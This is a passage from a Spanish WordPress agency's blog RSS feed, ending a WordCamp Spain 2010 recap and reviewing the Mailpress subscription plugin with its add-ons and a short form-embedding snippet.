<p><a href="http://onestic.com/resumen-de-la-wordcamp-spain-2010/onestic-en-la-wordcamp-spain-2010-junto-con-blogestudio-y-el-senor-munoz/" rel="attachment wp-att-961"><img class="size-full wp-image-961 alignright" title="Onestic-en-la-Wordcamp-Spain-2010-junto-con-Blogestudio-y-el-Señor-Muñoz" src="http://onestic.com/wp-content/uploads/2010/12/Onestic-en-la-Wordcamp-Spain-2010-junto-con-Blogestudio-y-el-Señor-Muñoz.jpg" alt="Onestic-en-la-Wordcamp-Spain-2010-junto-con-Blogestudio-y-el-Señor-Muñoz" width="313" height="98" /></a>Y por fin <a title="Blog de Fernando Serer" href="http://www.fernandoserer.com/" target="_blank"><strong>Fernando Serer</strong></a>, con su tan aplaudida ponencia (sobre todo en Twitter) sobre WordPress y el comercio electrónico. Temas y plugins para vender con WordPress. Que está claro que no es la misión de la plataforma en convertirse en un framework de tiendas online, pero para desarrollos rápidos, aprovechando quizás un site con Worpdress con cantidad de visitas, para crear tiendas con multitud de landing pages, es una cuestión a tener en cuenta. Y más después de tener en las manos el profundo análisis que expuso Fernando Serer y que realizaron en Blogestudio. Muy muy interesante. Superrecomendable <a title="Fernando Serer en la Wordcamp Spain 2010" href="http://www.slideshare.net/fserer/wordpress-como-plataforma-de-comercio-electrnico?from=ss_embed" target="_blank">ver la presentación en slideshare</a>.</p>
<p><strong>Jeffrey Pearce</strong> nos mostró su gran plugin WooThumbBlog, que forma parte de muchos temas que tienen a la venta en Woothemes. Jeffrey es un programador excepcional, y un tío muy simpático. Gracias a él nos vinimos con una camiseta de Woothemes, con un posible acuerdo para colaborar con ellos creando nuevos temas, y con un descuento del 30% en su plataforma <img src='http://onestic.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  <a title="Jeffrey Pearce in Wordcamp Spain" href="http://www.jeffikus.com/2010/12/11/wootumblog-post-formats-express-app-wordcamp-spain-2010-slides/" target="_blank">Su presentación, en su web</a>.</p>
<p>Y por último <strong><a title="Web de Rocío Valdivia" href="http://dorsvenabili.com/" target="_blank">Rocío Valdivia</a></strong> nos enseñó como crear plugins multilenguaje desde cero y de una forma muy sencilla. Seguro que mucha gente perdió el miedo a crear su propio plugins, y alguno que incluía nueva funcionalidad en el tema ahora usará sus propios plugins a partir de ahora. Faltó tiempo para hacer una demostración en vivo, pero fue <a title="Ponencia de Rocía Valdivia en la WordCamp Spain 2010" href="http://mecus.es/wordcamp-spain-2010-taller-de-plugins/" target="_blank">una ponencia muy interesante que podéis encontrar aquí</a>.</p>
<p>Para finalizar, queremos darle nuestro agradecimiento a la gente de <a title="Packet Loss" href="http://www.packet-loss.org/index_es.html" target="_blank">Packet Loss</a> (<a title="Raúl Illana" href="http://raulillana.com/" target="_blank">Raúl Illana</a>, Ismael Charif, <a title="Ricard Torres" href="http://php.quicoto.com" target="_blank">Ricard Torres</a>, etc etc) por hacer posible la Wordcamp en España y por el éxito de organización de este año. Y por supuesto a <a title="Cavalleto" href="http://soyplastic.net/" target="_blank">Cavalleto</a> (su <a title="Flickr de Cavalleto" href="http://www.flickr.com/photos/cavalleto/" target="_blank">flickr</a>) por ser testigo con su cámara y por permitirnos usar las fotos del evento.</p>
]]></content:encoded>
			<wfw:commentRss>http://onestic.com/resumen-de-la-wordcamp-spain-2010/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Mailpress. ¿Otro plugin más de suscripción?</title>
		<link>http://onestic.com/mailpress-otro-plugin-mas-de-suscripcion/</link>
		<comments>http://onestic.com/mailpress-otro-plugin-mas-de-suscripcion/#comments</comments>
		<pubDate>Thu, 08 Oct 2009 08:31:08 +0000</pubDate>
		<dc:creator>Sergio Nieto</dc:creator>
				<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[mail]]></category>
		<category><![CDATA[plugins]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://onestic.com/?p=399</guid>
		<description><![CDATA[En los últimos desarrollos en WordPress que hemos hecho para nuestros clientes, hemos venido incorporando el plugin de suscripción para los usuarios Mailpress. En un principio sólo buscábamos un plugin que diese soporte a la suscripción por correo a los artículos de un blog, pero Mailpress no ofrece sólo eso. Mailpress presenta un completo sistema [...]]]></description>
			<content:encoded><![CDATA[<p>En los últimos desarrollos en <strong>WordPress </strong>que hemos hecho para nuestros clientes, hemos venido incorporando el plugin de suscripción para los usuarios <a title="Página del plugin de Mailpress para WordPress" href="http://www.mailpress.org" target="_blank"><strong>Mailpress</strong></a>. En un principio sólo buscábamos un plugin que diese soporte a la suscripción por correo a los artículos de un blog, pero <strong>Mailpress </strong>no ofrece sólo eso.</p>
<p style="text-align: center;"><a href="http://onestic.com/wp-content/uploads/2009/10/800px-Settings_general1.jpg"><img class="aligncenter size-large wp-image-419" title="captura de Mailpress" src="http://onestic.com/wp-content/uploads/2009/10/800px-Settings_general1-590x310.jpg" alt="captura de Mailpress" width="590" height="310" /></a></p>
<p>Mailpress presenta un completo sistema de control de <span id="more-399"></span>suscripciones by mail, listas de correo, envíos por lotes, autoresponders, tracking de acciones sobre los correos enviados, etc. Además, si configuramos una plantilla con el estilo de nuestro blog, todos los correos de confirmación de cuenta, cambio de contraseña, etc, que se mandan desde <strong>WordPress </strong>tendrán ahora este nuevo estilo establecido desde <strong>Mailpress</strong>, manteniendo la imagen corporativa en la comunicación con los usuarios.</p>
<p>Y es que <strong>Mailpress </strong>se compone de un plugin principal, y distintos plugins a modo de addons que extienden la funcionalidad de este. Y son estos añadidos los que hacen que Mailpress ofrezca grandes posibilidades a la comunidad de <strong>WordPress</strong>. Os presentamos un listado de lo que están disponible a fecha de 08  de Octubre de 2009, con una breve explicación de su funcionalidad:</p>
<ul>
<li> <a href="http://www.mailpress.org/wiki/index.php?title=Add_ons:Autoresponder" target="_blank"><strong>Autoresponder</strong></a>: Son correos redactados previamente (guardados como borrador), que serán enviados dependiendo de los eventos o acciones que realicen los usuarios (respuesta a un alta en la suscripción, a una baja, etc). Funciona con wp_cron.</li>
<li> <a href="http://www.mailpress.org/wiki/index.php?title=Add_ons:Batch_send" target="_blank"><strong>Batch send</strong></a>: Permite configurar el envío por lotes de correos para grandes cantidades de usuarios, evitando saturar el servidor y que nos pueda perjudicar una identificación como posible spam.</li>
<li> <a href="http://www.mailpress.org/wiki/index.php?title=Add_ons:Bounces" target="_blank"><strong>Bounces</strong></a>: Nos facilita la labor de control de los correos que no llegan a sus destinatarios.</li>
<li> <a href="http://www.mailpress.org/wiki/index.php?title=Add_ons:Bulk_import" target="_blank"><strong>Bulk import</strong></a>: Añade un sencillo formulario en el listado de usuarios para introducir de forma rápida nuevos emails.</li>
<li> <a href="http://www.mailpress.org/wiki/index.php?title=Add_ons:Filter_img" target="_blank"><strong>Filter img</strong></a>: Nos evita el dolor de cabeza que algunos clientes de correo como gmail o hotmail nos dan con su tratamiento de imágenes y css en los correos.</li>
<li> <a href="http://www.mailpress.org/wiki/index.php?title=Add_ons:Form" target="_blank"><strong>Form</strong></a>: Incluye la creación de formularios para suscribirse, y poder así mandar diferentes mensajes personalizados.</li>
<li> <a href="http://www.mailpress.org/wiki/index.php?title=Add_ons:Import" target="_blank"><strong>Import</strong></a>: Permite importar listas de correo en formato csv y xmlsample, y desde los plugins suscribe2 y suscribe to comments.</li>
<li> <a href="http://www.mailpress.org/wiki/index.php?title=Add_ons:Mailinglist" target="_blank"><strong>Mailing list</strong></a>: Nos brinda la posibilidad de gestionar listas de correo.</li>
<li> <a href="http://www.mailpress.org/wiki/index.php?title=Add_ons:Newsletter_categories" target="_blank"><strong>Newsletter categories</strong></a>: Añade una categorización sobre las suscripciones, permitiendo configurar la suscripción a cada tipo de contenido por post, día, semana, mes, etc.</li>
<li> <a href="http://www.mailpress.org/wiki/index.php?title=Add_ons:Phpmail" target="_blank"><strong>Phpmail</strong></a>: Cambia el envío desde smtp a la función native de php mail.</li>
<li> <a href="http://www.mailpress.org/wiki/index.php?title=Add_ons:Roles_and_capabilities" target="_blank"><strong>Roles and capabilities</strong></a>: Para configurar los permisos sobre Mailpress para cada rol de WordPress.</li>
<li> <a href="http://www.mailpress.org/wiki/index.php?title=Add_ons:Sendmail" target="_blank"><strong>Sendmail</strong></a>: Cambia el envío de smtp a sendmail.</li>
<li> <a href="http://www.mailpress.org/wiki/index.php?title=Add_ons:Sync_wordpress_user" target="_blank"><strong>Sync wordpress user</strong></a>: Sincroniza usuarios de wordpress y de Mailpress, y permite apuntarse a suscripciones desde el formulario de registro de wordpress.</li>
<li> <a href="http://www.mailpress.org/wiki/index.php?title=Add_ons:Tracking" target="_blank"><strong>Tracking</strong></a>: Potentísima función que ofrece la posibilidad de realizar un seguimiento al detalle de las acciones que se realizan sobre los mails que enviamos con Mailpress.</li>
<li> <a href="http://www.mailpress.org/wiki/index.php?title=Add_ons:Upload_media" target="_blank"><strong>Upload media</strong></a>: Añade la opción de incorporar elementos multimedia a los correos, opción que no viene habilitado por defecto.</li>
<li> <a href="http://www.mailpress.org/wiki/index.php?title=Add_ons:View_logs" target="_blank"><strong>View logs</strong></a>: Muestra de forma sencilla y sin salir del administrador los logs relacionados con Mailpress.</li>
</ul>
<p>Más info en la página del plugin: <a title="Página del plugin de Mailpress para WordPress" href="http://www.mailpress.org" target="_blank">www.mailpress.org</a></p>
<p><strong>Actualización:</strong> Si queremos añadir el formulario de suscripción a nuestro <strong>WordPress</strong>, bien tenemos que añadir el widget de mailpress o bien pegar un código parecido a este en la parte que queramos de nuestra plantilla:</p>
<pre class="brush: php; title: ; notranslate">
&lt;div class=&quot;modulo enlaces&quot;&gt;
    &lt;p class=&quot;tit-sidebar&quot;&gt;Suscríbete a nuestro boletín&lt;/p&gt;
    &lt;ul class=&quot;bloque&quot;&gt;
        &lt;?php if (class_exists('MailPress')) MailPress::form(array('urlsubmgt'=&gt;1, 'txtbutton' =&gt; 'Suscribirse', 'txtsubmgt' =&gt; 'Gestionar suscripción' )); ?&gt;
    &lt;/ul&gt;
&lt;/div&gt;
</pre>
]]></content:encoded>
			<wfw:commentRss>http://onestic.com/mailpress-otro-plugin-mas-de-suscripcion/feed/</wfw:commentRss>
		<slash:comments>16</slash:comments>
		</item>
	</channel>
</rss>

